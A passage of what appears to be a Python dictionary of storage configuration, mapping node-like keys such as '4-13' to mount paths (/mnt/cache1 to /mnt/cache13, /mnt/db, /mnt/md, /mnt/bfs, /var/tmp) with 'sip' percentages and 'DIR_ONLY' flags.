'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'12-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'11-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'11-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'12-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'12-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'4-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'4-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'7-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-4': {'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'7-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'7-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'4-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'4-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'4-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'4-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'5-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'5-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'12-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'1-0': {'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'4-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'11-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'11-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'11-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'11-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'12-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'6-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'6-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'6-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'6-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'6-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'1-6': {'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '80', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'6-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'9-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'9-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'9-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'5-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'9-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'0-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'4-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'12-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
